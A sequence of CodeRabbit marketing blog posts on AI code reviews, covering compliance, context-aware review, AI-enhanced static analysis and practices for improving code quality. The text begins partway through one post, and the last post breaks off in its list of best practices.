### Focus on higher-level design and problem-solving In application design, AI code reviews shift the focus from routine coding to strategic activities like architectural planning, system integration, and enhancing user experience. The change in focus allows developers to [spend more time brainstorming](https://coderabbit.ai/blog/ai-code-reviews-reclaims?) the next big idea or refining the system architecture. It also leads to a final product that is innovative and user-centric. ### Streamlined collaboration and knowledge sharing Embracing AI code reviews means everyone speaks the same coding language, follows the same best practices, and learns from each other continuously. Additionally, these systems act as a centralized knowledge base, providing consistent guidelines and suggestions that help teams sidestep common pitfalls and harness collective wisdom. By standardizing coding practices, AI code reviews make it easier for new and seasoned developers to collaborate effectively. Developers welcome these changes, as they enable them to develop software much faster and with greater precision. As a result, organizations see enhanced productivity and a marked improvement in overall product quality. ## Changes in skills requirements and training The introduction of AI in code reviews isn't just altering workflows; it's also reshaping the skill sets that software developers need to thrive. As coding becomes more automated, their focus must shift from traditional programming to a blend of technical knowledge and soft skills that emphasize adaptation and innovation. ### Shift towards domain-specific knowledge The more routine coding tasks AI handles, the more developers find that deep industry knowledge is crucial. Understanding the specific challenges and needs of your industry can make or break the effectiveness of your coding efforts. 
It’s not enough to write code that works; the goal is to craft solutions that resonate with business objectives and user expectations. ### Emphasis on problem-solving and creativity In this new AI-enhanced environment, creativity and problem-solving are highly valued. Developers are encouraged to think outside the box and use AI tools as springboards for innovative solutions. In this context, the ability to creatively leverage AI for complex problem-solving, together with critical thinking and a knack for innovation, can set a developer apart from their peers. ### Continuous learning and adaptation Staying relevant in a rapidly evolving tech environment means continuous learning is non-negotiable. Developers must keep pace with the latest AI technologies and programming languages. More importantly, adapting to new methodologies and tech landscapes becomes part of the daily routine. The landscape keeps evolving, and developers must evolve with it to leverage AI effectively and maintain their competitive edge. To stay competitive in the job market, developers must reevaluate their skills and embrace continual learning and development. This reflects a broader transformation across the tech industry where rapid adaptation and ongoing education aren't just beneficial; they're crucial for success. ## CodeRabbit: elevating dev teams with AI code reviews In software development, leading the way is about more than just keeping up with trends. That’s where [CodeRabbit comes in](https://coderabbit.ai/blog/coderabbit-deep-dive), transforming development with its AI-driven code review tools. CodeRabbit tailors its tools to align with your team's specific code review checklist and feedback. Moreover, it enhances the accuracy of its suggestions and seamlessly integrates organizational knowledge into your code reviews. 
Discover how [CodeRabbit can take your dev team](https://coderabbit.ai/blog/coderabbit-deep-dive) to the next level with AI-enhanced code reviews. Experience a new height of strategic thinking and innovation. Sign up today for a free trial and start transforming your dev team with the power of AI-driven code reviews.

The Role of AI Code Reviews in Compliance and Coding Standards

Aravind Putrevu — Wed, 24 Apr 2024 00:00:00 GMT

Developers follow coding standards and compliance rules to make sure all the software they build is safe, reliable, and compatible with other systems. However, coding standards and compliance rules can feel restrictive, like being told exactly how to do your job every step of the way. It can slow things down when you have to constantly check your work against specific rules, especially when you want to try something new or innovative. Taking fun and freedom out of the coding process was never the intention, but that is exactly what happens when a rulebook is introduced. With AI code reviews, this doesn't have to be the case. AI automates much of the repetitive work of ensuring compliance, freeing developers to focus more on creativity and innovation. It's a significant shift that streamlines workflows and fosters a more enjoyable coding environment. ## The Importance of Coding Standards and Compliance In software development, coding standards and compliance establish a common language and structured process that all developers adhere to. Following these guidelines produces software that is secure and interoperable with other systems. Think of these standards as the foundation of a building; without a strong foundation, the structure won't stand up to the elements, much like software won’t perform well without a solid base of clean, standardized code. Ignoring these coding standards can lead to some pretty serious issues. For starters, it can make the software difficult to maintain and update. Faulty attempts to decipher non-standard code can cause a system to crash or open the door to hackers. Poorly written code can lead to security vulnerabilities, similar to leaving your doors unlocked in a crowded place. If your software isn’t up to standard, it's much easier for someone with bad intentions to sneak in and cause trouble. Consequently, while developers might find it a hassle to stick strictly to these standards, it’s a necessity. 
No one likes to hear “rules exist for a reason.” But they keep your software safe, functional, and in line with legal requirements, acting as the guardrails that keep the software development process on track and out of trouble. ## Traditional Approaches to Code Reviews Code reviews have long been a staple in the software development world. They involve a developer or a team of developers checking each other's code for errors to meet all necessary standards before it goes live. While the intention is good, the [traditional methods of code reviews](https://coderabbit.ai/blog/how-ai-is-transforming-traditional-code-review-practices), like manual and peer reviews, come with their own set of challenges. A manual review is a process where a developer meticulously goes through code line by line. It's thorough but incredibly time-consuming. Imagine trying to find a few misspelled words in a novel-sized manuscript. Plus, it’s all too easy to miss errors just because of human fatigue. Staring at lines of code for hours isn’t exactly easy on the eyes or the brain. Peer reviews involve one or more colleagues reviewing the code. It adds a layer of collaboration, which is great for team dynamics and can bring new perspectives to the table. However, it's not without its flaws. Peer reviews can be inconsistent—different reviewers might have different opinions on what’s correct or best. There’s also the risk of bias. Maybe the reviewer had a long day, or perhaps they just don’t gel well with the coder—factors like these can influence the objectivity of the review. In short, traditional code reviews are a bit like proofreading by hand in a digital age—a necessary process, but one fraught with limitations in speed, accuracy, and efficiency. ## Benefits of AI in Code Reviews As technology evolves, so do the methods we use to ensure our code is top-notch. Enter AI code reviews, a modern twist on the traditional process that brings a lot of smarts and efficiency to the table. 
It’s an innovative approach that introduces a level of objectivity that is hard to achieve with human reviewers alone. AI code reviews bring an [elevated level of efficiency](https://coderabbit.ai/blog/boosting-engineering-efficiency) and fairness to how we handle code quality. It streamlines the review process, allowing for quicker iterations and consistent standards across all projects. * **Speed:** AI can process thousands of lines of code in the time it takes a human to make a cup of coffee. This means faster turnaround times and more efficient workflows. * **Consistency:** AI doesn’t have off days. It applies the same standards to every review, ensuring that every piece of code meets the same quality criteria, no matter who wrote it or when it was reviewed. * **Unbiased:** AI looks at the code and nothing but the code. It doesn’t care who wrote it, making its assessments based purely on the quality of the code, not the coder. The reliability, speed, and objectivity that AI brings to code reviews mark [a significant upgrade from traditional methods](https://docs.coderabbit.ai/blog/ai-transforming-traditional-code-review-practices/). It’s more than a minor improvement—it really boosts productivity and ramps up the overall quality of the software produced. ## AI Code Reviews for Enforcing Coding Standards AI code reviews act like the ultimate umpires, making sure that everyone on the team plays by the same rules. They're programmed to understand and enforce specific coding standards, so that every line of code works and meets the high standards your project demands. ### How CodeRabbit AI code reviews streamline development Take [the case of a developer](https://tomaszs2.medium.com/ai-can-make-a-code-review-for-free-a559cf74efa5) that integrated CodeRabbit’s AI code reviews into his GitHub account. Installation was straightforward: after a few clicks to set permissions and choose the service provider, his system was ready to review code pushed to repositories. 
He then used it in a basic Angular project, where it quickly identified key improvements and ignored trivial formatting, focusing instead on substantive changes. In his view, CodeRabbit provided immediate, insightful feedback like a mentor. The AI-powered code review highlighted significant issues and provided a summary of the merge request, focusing on key changes without getting bogged down by formatting errors, which it wisely ignored. It also included unique features like generating a summary of the merge request and offering a walkthrough of changes. CodeRabbit’s level of detail highlighted only the essential aspects of the code, avoiding minor issues to save [significant time and effort](https://coderabbit.ai/blog/ai-code-reviews-reclaims). ## AI Code Reviews for Ensuring Compliance AI code reviews make sure software adheres strictly to the rules, acting like a vigilant watchdog that's always on duty. They're not just about keeping code clean; they also make sure everything is in line with legal and regulatory standards. Here’s how AI steps up to make compliance less of a headache. ### Identifying non-compliance AI tools are incredibly sharp at spotting when something doesn’t add up to established compliance standards. Think of these tools as high-tech scanners that sift through code, looking for any deviations from required protocols. They catch slip-ups in critical areas such as data privacy under GDPR or health information protection under HIPAA. Taking a proactive approach here prevents costly violations and enhances the overall security of the software system. ### Role in continuous compliance monitoring Keeping up with compliance doesn’t end with the launch of a software product; it’s an ongoing process. That’s where AI really shines. An AI-powered system continuously monitors the code base, checking updates, patches, and changes to ensure compliance is maintained at every step of development and deployment. 
It keeps all adjustments within the compliance framework, making ongoing monitoring far less burdensome for development teams. However, the appeal doesn't stop there. As regulations evolve, AI systems can adapt to new requirements, automatically updating their checks and balances to align with the latest compliance standards. Adopting a proactive approach saves time and helps avoid potential legal issues down the road. ### Impact on meeting regulatory standards The real power of AI-driven code reviews is its ability to vastly reduce the risk of non-compliance penalties, which can be severe. AI’s precision in enforcing regulations protects businesses from legal issues and boosts their reputation for reliability and security. In an environment where a single slip-up can cost millions, AI provides a safety net that keeps your code—and your company—on the right side of the law. AI’s ability to automate compliance checks promotes continuous adherence, eliminating the need for constant manual oversight that can drain resources. As a result, developers focus more on innovation and less on regulatory red tape. ## Enhancing Compliance and Coding Standards with CodeRabbit AI Code Reviews AI technology is becoming a vital collaborator in the realm of compliance and coding standards. It is [increasingly capable of performing complex reasoning tasks](https://coderabbit.ai/blog/coderabbit-deep-dive), offering design suggestions, and recommending best practices that align with regulatory requirements. However, fully leveraging AI in code reviews and compliance requires a careful integration of human expertise with AI capabilities. This partnership excels in navigating the complexities of regulatory frameworks in software development. It enables organizations to boost their compliance, minimize errors, and foster a proactive culture of quality assurance across their development teams. 
Discover how CodeRabbit, the leading AI code review tool for GitHub and GitLab, can elevate your team's compliance and coding standards. Sign up today for a free trial and begin transforming your development process with the power of AI-driven compliance.

The Benefits of Context-Aware Code Reviews

Aravind Putrevu — Mon, 22 Apr 2024 00:00:00 GMT

Ever noticed how a little context can change everything? Understanding a friend’s mood before giving advice, or knowing the backstory before watching a sequel, shows just how much context matters. The same principle applies to coding. Without context, code reviews can miss the mark. Traditional approaches often focus on surface issues while deeper, more complex problems go unnoticed. That’s where context-aware code reviews step in. They bring a deeper understanding to the table, turning a routine check-up into a strategic asset. It’s a smarter approach to reviewing code that can transform the way your projects develop and ensure everything runs just as intended. ## What are Context-Aware Code Reviews? Code reviews act as regular check-ups to ensure your code runs [smoothly and efficiently](https://coderabbit.ai/blog/boosting-engineering-efficiency). However, there's a game-changer in the mix: context-aware code reviews. ### The depth of context-aware code reviews Context-aware code reviews go beyond the basics. Instead of just looking at lines of code for errors, these reviews understand the context in which the code operates. They consider items like the project's goals, the functionality of other parts of the code, and how recent changes might affect the overall system. Take APIs as an example. Context-aware reviews scrutinize how compatible they are with existing systems, their impact on the software’s infrastructure, and whether they follow best practices. They enable APIs to integrate smoothly with your existing framework and effectively achieve your project's goals. Common factors considered in context-aware code reviews include: * **Adherence to coding standards:** Reviews ensure changes adhere to project-specific coding conventions, such as file naming and directory structures. They also assess whether the changes properly use existing libraries, classes, or methods instead of duplicating functionality. 
* **Impact on existing code:** Code reviews must assess whether changes introduce bugs into existing code and identify additional tests needed to prevent such issues. Reviewers also ensure that any necessary updates to API or user documentation are not overlooked. * **Infrastructure and performance considerations:** Reviews evaluate whether the change requires database or API migrations and consider the potential impact on system performance. They also check if the change could cause performance degradation in other parts of the codebase. * **Security and robustness:** The review process involves trying to "break" the new changes to find any potential bugs or security vulnerabilities. The goal here is to ensure new additions are robust and secure. * **Consistency and optimization:** Reviewers check for consistency in the new APIs with the existing API surface and assess whether the changelog entries accurately reflect the changes. They also consider if the presented solution is the most appropriate for the problem at hand. Context-aware code reviews, with their thorough approach, truly elevate the practice of software development. It’s not just about having automated checks, however. A solid understanding of the code base is essential for this process. In turn, they make sure every line of code performs well and seamlessly integrates with the entire system. ### The Difference from Traditional Code Reviews Traditional code reviews are somewhat like proofreading a document for grammar and spelling errors without worrying about the story or the intent behind it. Useful, yes, but possibly missing bigger issues like plot holes or character inconsistencies. Traditional code reviews are often [incredibly time-consuming](https://coderabbit.ai/blog/ai-code-reviews-reclaims). It's one of the slowest parts of software development, often becoming a bottleneck that delays the shipping of code. 
The slowdown happens because each team member has to meticulously review each line of code, checking everything from correctness and readability to performance and security. Imagine the time it takes to do this for just one pull request, now multiply that by several in a week. Then there's the issue of human error, which is all too common in manual code reviews. Reviewers have to juggle numerous factors to provide useful feedback and avoid missing anything crucial, which requires intense concentration. Despite best efforts, it's easy to miss subtle bugs or overlook potential security risks, especially when fatigued or under tight deadlines. In this situation, developers are prone to creating long-term problems that compromise the product's integrity and user trust. In contrast, context-aware code reviews look at the code as a part of a larger picture. Sure, they identify straightforward errors but also subtler issues that could affect the application's behavior in specific scenarios. ### Powered by AI and Machine Learning AI and machine learning are the driving forces behind the intelligence of these reviews. By leveraging these technologies, review tools can learn from past code, recognize normal patterns, and predict potential problems based on vast amounts of data. Their primary focus isn’t about catching a forgotten semicolon; it's about predicting how a small change could ripple through your system in unexpected ways. By incorporating AI, context-aware code reviews transform into a wise mentor for developers—constantly learning and adapting, offering insights tailored to optimize and secure code in ways that align perfectly with the intended use of the software. CodeRabbit exemplifies this approach by integrating AI into the review process, serving as both a guide and an assistant. 
Here’s how CodeRabbit elevates context-aware code reviews, providing features that not only streamline but also significantly enhance the development process: * **Pull request summaries:** CodeRabbit automatically generates comprehensive summaries of pull requests. It provides detailed walkthroughs that break down the changes introduced, organizing them by file or directory. As a result, developers can quickly grasp the modifications without the tedious process of manually testing and iterating through changes, significantly saving time and simplifying the review process. * **Chat with code:** CodeRabbit enhances the interactivity of code reviews by allowing developers to engage directly with the tool through a chat interface. Developers can ask for detailed explanations about suggested changes, propose alternatives, or provide corrections to enhance the tool’s learning. Having this capability transforms CodeRabbit into an always-available, knowledgeable teammate that makes the review process more engaging, insightful, and enjoyable. * **In-depth code reviews:** CodeRabbit conducts thorough, incremental reviews with each new commit, ensuring each piece of code is meticulously examined. Think of this feature as a second pair of eyes, spotting potential issues, bugs, or vulnerabilities that might be missed otherwise. For every issue detected, CodeRabbit offers detailed explanations and actionable suggestions, effectively serving as a coding buddy guiding the development process. * **Make direct changes:** CodeRabbit includes a "Committable suggestion" feature that allows developers to apply suggested changes directly, minimizing the risk of errors advancing to production and ensuring a higher quality final product. By leveraging these advanced features, CodeRabbit enhances [traditional code reviews](https://coderabbit.ai/blog/how-ai-is-transforming-traditional-code-review-practices). 
It acts as a supportive tool for developers, freeing them to concentrate on tackling more complex issues and making strategic decisions. ## Unpacking the Unique Advantages of Context-Aware Code Reviews Digging into the details of context-aware code reviews shows just how transformative they can be for software development projects. Far from just enhancing code quality, these advanced reviews revolutionize the developer experience and significantly influence project outcomes: * **Spot subtle discrepancies:** By understanding the full landscape of a project, context-aware reviews can detect subtle discrepancies that might otherwise go unnoticed under traditional review processes. These can include interactions between modules that could lead to unexpected bugs. * **Accelerate development cycles:** With their efficiency and precision, context-aware reviews streamline the development process. By reducing the cycle of feedback and revisions, they allow developers to progress faster, ultimately speeding up the entire project timeline. * **Improve software health and longevity:** By ensuring that new code integrates seamlessly with existing systems, these reviews help maintain a clean and scalable codebase. This not only improves current project stability but also extends the software's longevity and ease of future enhancements. * **Enhance security proactively:** These reviews proactively address potential security vulnerabilities by considering how changes affect the overall system, not just the immediate functionality. This holistic view helps prevent security issues before they become threats. * **Tailor developer support:** Beyond identifying issues, context-aware code reviews provide personalized feedback to developers, facilitating a learning environment that fosters continuous improvement and skill enhancement. Adopting context-aware code reviews really helps development teams step up their coding game and foster a more collaborative environment. 
It's a smart move that leads to fewer setbacks, lowers risk, and results in a stronger product. Building on this solid foundation of improved productivity and quality, [CodeRabbit is at the forefront](https://coderabbit.ai/blog/coderabbit-deep-dive), revolutionizing code reviews with our cutting-edge, context-aware solutions. We harness the power of advanced AI to provide more nuanced insights and feedback so that every piece of code fits perfectly within your project's framework. Embark on a journey of precision and innovation with CodeRabbit and discover how our context-aware code reviews can transform your development process.

Boosting Static Analysis Accuracy with AI

Aravind Putrevu — Thu, 18 Apr 2024 00:00:00 GMT

The phrase “static analysis” might sound fancy, but the concept is quite straightforward. Think of static analysis as a pre-check for software, kind of like proofreading an article before it's published. Before any software is actually used, it goes through this process where the code (basically the set of instructions that tell the software what to do) is reviewed while it's inactive, or 'static.' Static analysis aims to catch any issues that could make the software hard to update or vulnerable to attacks, well before these problems can cause any harm. It's a way to make sure that by the time software reaches people like you and me, it's working smoothly and safe to use. However, this process isn’t perfect. Integrating AI with static analysis can significantly refine this procedure. ## Understanding Static Analysis Static analysis allows developers to examine their code before it runs. It helps them identify errors early so that the code is cleaner, more efficient, and less bug-prone from the start. This process involves scanning the program's code, checking for anything from syntax errors to potential security vulnerabilities, without the need to execute the program. It’s not a luxury, either. Taking a preemptive approach enables developers to catch issues that could compromise the software's functionality or security later on. Using static analysis offers organizations these key benefits: * **Streamlines code compliance:** Static analysis simplifies adhering to coding standards, allowing your development team to deliver compliant code without sacrificing speed. * **Enhances security:** Catches new vulnerabilities through static application security testing (SAST) scans before code reaches production, reducing the risk of security breaches over time. * **Speeds up onboarding:** Helps maintain a clean and readable codebase, making it easier for new developers to get up to speed quickly. 
* **Improves reliability:** Reduces the likelihood of new defects being introduced into the code, enhancing software reliability over time. In the end, static analysis makes the whole development process more secure, fast, and reliable. It’s all about giving developers the tools they need to do their best work without any extra headaches. ### Common Culprits Caught by Static Analyzers Before diving into the specifics, let's consider what static analyzers actually do in the coding process. Think of them as the vigilant editors of the coding world. They look for a variety of issues that could spoil your code: * **Syntax errors:** Basic mistakes like missing semicolons or mismatched parentheses; think of them as typos in your code. * **Potential bugs:** More subtle issues, like variables that are never used or set up incorrectly, which can lead to unexpected behaviors. * **Security vulnerabilities:** Serious flaws that could make your software an easy target for hackers, such as insecure data handling or weaknesses in authentication. But static analysis isn't perfect. While it is extremely helpful, it’s not without its quirks. Traditional tools sometimes act like an overzealous editor who can’t quite grasp the context of your story. They might flag too many false positives, warning you about problems that aren’t actually problems. They might also miss the context: these tools don’t always see the bigger picture, so they may not understand how different pieces of your code interact, leading to missed issues or irrelevant warnings. In essence, while static analysis is an indispensable part of modern software development, it's not a silver bullet. It helps clean up code and catch issues early, but it also needs a bit of help itself to really understand what’s going on. That’s where AI comes into play. 
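To make both the culprits and the blind spots concrete, here is a minimal sketch of a static check written with Python's standard `ast` module. It is an illustration under simple assumptions, not how any production analyzer works: the `find_issues` function and the sample snippet are hypothetical, and the unused-name rule deliberately ignores scopes and imports.

```python
import ast


def find_issues(source: str) -> list[str]:
    """Report a syntax error, or names that are assigned but never read."""
    try:
        # Parsing only: the code under review is never executed.
        tree = ast.parse(source)
    except SyntaxError as exc:
        return [f"line {exc.lineno}: syntax error: {exc.msg}"]

    assigned: dict[str, int] = {}  # name -> earliest line where it is assigned
    read: set[str] = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Name):
            if isinstance(node.ctx, ast.Store):
                first = assigned.get(node.id, node.lineno)
                assigned[node.id] = min(first, node.lineno)
            elif isinstance(node.ctx, ast.Load):
                read.add(node.id)

    # Simplification: one flat namespace, no awareness of other files.
    return [
        f"line {line}: '{name}' is assigned but never used"
        for name, line in sorted(assigned.items(), key=lambda item: item[1])
        if name not in read
    ]


SAMPLE = """\
def total(prices):
    tax = 0.2
    subtotal = sum(prices)
    return subtotal
"""

if __name__ == "__main__":
    for issue in find_issues(SAMPLE):
        print(issue)
```

Run on the sample, the check reports that `tax` is assigned on line 2 but never used, which is a genuine finding. Run on a one-line module containing only `VERSION = "1.0"`, it raises the same warning even if another file imports `VERSION`. That is the kind of context-blind false positive described above.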
## The Rise of AI in Software Development AI isn't just about robots and self-driving cars; it's also making big waves in the world of software development. Think of AI as that new assistant who not only helps with the heavy lifting but also brings some smart insights and ideas that change the way things are done. Its ability to greatly improve quality and efficiency promises to [transform the traditional coding canvas](https://coderabbit.ai/blog/how-ai-is-transforming-traditional-code-review-practices). ### Revamping Traditional Coding Practices AI is like a new power tool in the developer’s toolkit. Like a high-performance drill, it [speeds up construction and enhances precision](https://coderabbit.ai/blog/coderabbit-deep-dive). Its impact is profound, transforming the coding game in several different ways: * **Automate the mundane:** From generating boilerplate code to sorting through databases, AI is taking over the tedious tasks, letting developers focus on the more creative aspects of programming. * **Spot errors before they bite:** Remember the static analyzers we talked about? AI is giving them a major upgrade. It’s like having a smarter, context-aware sidekick that not only finds the typos but also suggests the best ways to fix them. * **Predictive coding:** AI can predict what a developer wants to type next, almost like auto-complete on your phone but way smarter. It’s learning from the vast amounts of code it has seen before, making educated guesses to speed up the coding process. As AI evolves, it will bring even more sophistication and efficiency to software development. Think faster project completion and enhanced code quality, without the usual stress and extended work hours. ### Why Mix AI with Software Tools? AI is known for its remarkable ability to analyze and interpret data, enabling it to identify patterns and make predictions with unparalleled speed and accuracy. 
It also has the capacity to automate routine and complex tasks, increasing productivity and efficiency. AI constantly learns from new data, improving its performance over time and enabling it to make more informed decisions. By bringing AI into the mix, companies streamline their operations, optimize performance, and foster innovation, paving the way for more advanced and adaptive software solutions. The most notable benefits include: * **Boosted efficiency:** AI can automate complex tasks, which speeds up the development cycle significantly. More time for coffee breaks! * **Enhanced accuracy:** With AI’s ability to learn and adapt, it gets better at catching bugs and smoothing out processes over time. Think fewer headaches and late-night coding marathons. * **Innovative solutions:** AI can analyze data and user behavior to suggest new features or improvements that might not be obvious to human eyes. In short, AI in software development isn’t just a fad; it’s a transformative tool that’s making coding smarter, faster, and even a bit more fun. As AI continues to evolve, it’s exciting to think about all the new doors that could open for developers and businesses alike. ## AI-Enhanced Static Analysis Developers have a compelling reason to bring AI into the mix, beyond just the improved accuracy and efficiency. AI really personalizes the analysis process, tailoring its approach to fit each developer's unique style and the specific quirks of the project they're working on. It’s not a one-size-fits-all solution. Instead, this personalization allows AI-driven tools to provide more relevant insights and recommendations. In the end, [developers spend far less time](https://coderabbit.ai/blog/ai-code-reviews-reclaims) trying to decipher generic results. Additionally, AI fits right in with continuous integration tools, providing real-time analysis and feedback that’s crucial for agile development environments. 
This makes AI not just a tool for spotting errors, but a key player in making the whole development process more intuitive and responsive. ### Tackling False Positives in Static Analysis Have you ever had an alarm go off because you burnt your toast, making it seem like your kitchen was about to go up in flames? False positives in static analysis are kind of like that: annoying and often misleading. But here’s where AI steps in to save the day. By learning from patterns in code and past errors, AI can distinguish between what’s genuinely problematic and what’s just a false alarm. This means fewer interruptions and more focus on real issues. AI employs sophisticated algorithms, such as machine learning and deep learning, to get better at what it does over time. By analyzing historical data and past interactions, it reduces the rate of false positives on a continual basis. Not only does this make static analysis more accurate, it also speeds up the development process. Fewer false positives mean developers waste less time on dead ends. Plus, when AI handles the routine checks, it smooths out the workflow and boosts productivity. As a result, teams put more energy into innovation and other high-value development tasks. ### Smart Techniques for Smarter Analysis AI isn't just one tool; it's an entire toolbox that brings different techniques to refine static analysis. Take machine learning (ML) models, the brainy statisticians of the AI world. ML models analyze vast amounts of code to learn what bugs look like, which helps them spot potential issues more accurately. [Natural language processing](https://www.techtarget.com/searchenterpriseai/definition/natural-language-processing-NLP) (NLP) is another powerful tool. It’s a technique that allows AI to understand code not just as cold syntax but almost like human language. 
By grasping the nuances of code as if it were human conversation, AI gains an understanding of the intent behind the code, which makes it better at identifying actual errors and suggesting effective fixes. It's almost human-like, but purely analytical. In this context, NLP brings the analysis closer to how developers think and makes its feedback more intuitive. ## CodeRabbit Elevates Software Quality with Static Analysis CodeRabbit is at the cutting edge of software quality assurance, and our approach to static analysis is transforming the way developers work. Leveraging advanced AI technologies, we enhance static analysis to perform deeper and more accurate code assessments. Our tools integrate seamlessly with the latest development environments, helping your code not only meet but exceed industry standards. [Join us on this transformative journey](https://app.coderabbit.ai/login?free-trial&_gl=1*1nnlmqs*_gcl_au*MTYyMzk4MDEzLjE3MDk3NTg2NDk.) and see how our innovative static analysis solutions can elevate your development process to new heights.

Code Reviews Made Easy: How to Improve Code Quality

Aravind Putrevu — Tue, 16 Apr 2024 00:00:00 GMT

The fastest way to tank a team's ability to improve code quality is to exhaust the people responsible for maintaining it. Most teams know how to improve code quality in theory: write tests, enforce standards, review every pull request (PR). The hard part is doing all of that without grinding senior engineers into dust. Adding more checklists, more review gates, and more meetings on top of an already-stretched team leads to resignations, not better software. This piece covers the practices, metrics, and workflow patterns that actually improve code quality while keeping cognitive load manageable. You’ll learn how to automate the cheap stuff, shrink the review surface, and save human judgment for the decisions only humans can make. ## What "code quality" actually means in modern development Code quality in modern development is the degree to which an engineer unfamiliar with the codebase can change it correctly. That breaks down into a few concrete properties: * **Maintainability:** A non-trivial change doesn't break something the author didn't know existed. * **Testability:** There's a reliable way to know the change worked before it ships. * **Security:** Credential handling, input validation, and the failure modes that turn into post-mortems. Code quality issues compound as technical debt. The work doesn't stop; it just costs more every time. The [Stack Overflow Developer Survey 2024](https://survey.stackoverflow.co/2024/professional-developers) confirmed that 63% of professional developers cite technical debt as their number-one frustration at work. Quality debt slows your team even more than it slows the code, and the engineers who feel it first are the senior ones doing the most reviews. ## Why traditional code quality practices break at scale [Code review bottlenecks](https://www.coderabbit.ai/blog/nobody-is-going-to-read-the-code) come more from cognitive load than scheduling. 
As teams grow, the volume of work that needs reviewing grows faster than the pool of senior engineers qualified to review it. Three structural patterns explain how that gap turns into a break: * **PR size:** Reviewers skim long diffs. Once a diff crosses the threshold of what one person can hold in their head, careful review turns into pattern-matching for the obvious stuff. * **Reviewer load:** Senior engineers carry the worst of the review burden, on top of architectural review, security review, and mentorship. [JetBrains' Developer Ecosystem Survey 2025](https://blog.jetbrains.com/research/2025/10/state-of-developer-ecosystem-2025/) confirms that coordination responsibilities increase with experience. * **AI-generated volume:** AI tools ship more PRs, and each PR carries more issues than human-only code. [CodeRabbit's State of AI vs Human Code Generation Report](https://www.coderabbit.ai/blog/state-of-ai-vs-human-code-generation-report) analyzed 470 open-source PRs and found AI-co-authored PRs produce 10.83 issues per PR on average, compared to 6.45 for human-only PRs. As a result, reviewer fatigue compounds, bugs slip through, and coding conventions fade because nobody has time to enforce them. Eventually, a senior engineer leaves, and the team realizes nobody else knew what the conventions were. ## How to assess code quality (and know it's improving) Two metrics do the load-bearing work: cycle time and defect escape rate. Pick a baseline, watch the trend, and the rest sorts itself out. **Cycle time** is the time from when a PR opens to when it merges. It captures most of what goes wrong in review. If it's climbing week over week, something has shifted. PRs are getting bigger, reviewers are slower, or comments are stalling on low-priority issues instead of substance. Cycle time hides two distinct problems, and the diagnosis matters. 
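One way to tell the two apart is to split each PR's cycle time at its first review. The sketch below is a minimal illustration in Python, assuming you can export three timestamps per merged PR; the `PullRequest` record and the `cycle_time_breakdown` function are hypothetical names, not part of any tool mentioned here.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from statistics import median


@dataclass
class PullRequest:
    opened_at: datetime
    first_review_at: datetime
    merged_at: datetime


def _hours(delta: timedelta) -> float:
    return delta.total_seconds() / 3600


def cycle_time_breakdown(prs: list[PullRequest]) -> dict[str, float]:
    """Median hours for the whole cycle and for each of its two phases."""
    if not prs:
        raise ValueError("need at least one merged PR")
    return {
        # Open to merge: the headline number.
        "cycle_time_hours": median(_hours(pr.merged_at - pr.opened_at) for pr in prs),
        # Open to first review: how long authors wait for a reviewer.
        "time_to_first_review_hours": median(
            _hours(pr.first_review_at - pr.opened_at) for pr in prs
        ),
        # First review to merge: how long the back-and-forth takes.
        "time_in_review_hours": median(
            _hours(pr.merged_at - pr.first_review_at) for pr in prs
        ),
    }


# Made-up sample data for one team and one week.
SAMPLE_PRS = [
    PullRequest(datetime(2024, 4, 1, 9), datetime(2024, 4, 1, 13), datetime(2024, 4, 2, 9)),
    PullRequest(datetime(2024, 4, 2, 9), datetime(2024, 4, 3, 9), datetime(2024, 4, 3, 15)),
    PullRequest(datetime(2024, 4, 3, 9), datetime(2024, 4, 3, 11), datetime(2024, 4, 3, 19)),
]

if __name__ == "__main__":
    print(cycle_time_breakdown(SAMPLE_PRS))
```

Medians are used here so that a single stalled PR does not dominate the trend. Because each median is taken independently, the two phase values need not add up to the overall figure.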
Long time-to-first-review means reviewer capacity is the constraint, so the fix sits on the reviewing side: automate the first pass, distribute load, cap incoming PR size. Long time-in-review-cycles means feedback is unclear or comments stall on low-stakes issues, so the fix sits on the comment side: clearer review standards, written norms, prioritized blocking comments. Track cycle time at the team level, not the individual level. Compare against your own historical baseline rather than an industry number. **Defect escape rate** is the second metric worth watching. What percentage of bugs reach production instead of getting caught in review? Down means quality is improving. Up means something is broken upstream. If you don't tag bugs as "should have been caught" versus "genuinely subtle," start. The category split is where the actionable signal lives. Numbers tell you what happened, but qualitative signals tell you what's about to happen. Watch for: * **Reviewer complaints:** Senior engineers volunteering frustration about review load is a leading indicator before any metric moves. * **Author complaints:** Junior engineers saying their PRs sit too long is the same signal from the other end. * **Review skipping:** PRs getting merged without review during crunch weeks means quality is already breaking down upstream of anything you'd track. You know it's working when cycle time trends down or stays flat as PR volume grows, defect escape rate drops, first-review waits shrink, and senior engineers stop complaining about review burden. None of these are numbers you can hit overnight. They move on quarter-scale, not week-scale, and the most reliable way to read them is against your own history. ## Best practices to improve code quality without killing velocity Five practices move the needle on code quality the most, and none of them are new. 
The reason teams still ship buggy code is not that the practices are unknown; it's that the cost of executing them consistently has been higher than the cost of skipping them. ### 1. Keep PRs small Small PRs are one of the biggest levers on review quality. Long diffs invite skimming, and skimming is how bugs reach production. A change small enough to hold in your head lets a reviewer give substantive feedback instead of pattern-matching across a sprawling diff. [Google's engineering practices documentation](https://google.github.io/eng-practices/review/developer/small-cls.html) backs this up and gives reviewers explicit authority to reject changes solely for being too large. Smaller review units also reduce reviewer fatigue and move feedback through faster. ### 2. Adopt trunk-based development Trunk-based development is the practical enforcement layer for keeping PRs small. When everyone integrates into a shared trunk within a day or two, big speculative changes never get a chance to accumulate. Merge conflicts shrink, and reviewers see incremental work instead of multi-week dumps. Feature flags handle the parts that aren't ready to ship, so the team can keep merging without exposing half-built features to users. The combination gives you frequent, low-risk merges and keeps the team in the habit of reviewing fresh code instead of archaeology. ### 3. Automate testing Automated testing moves quality enforcement to the cheapest place to fix problems: before the code reaches a reviewer. A reliable suite of unit tests for logic, integration tests for boundary behavior, and a small set of end-to-end tests for critical paths catches the failures that would otherwise eat review time. Tests run in continuous integration (CI) on every PR, fail loudly, and block the merge until resolved. The point isn't 100% coverage; it's coverage on the paths that actually fail. 
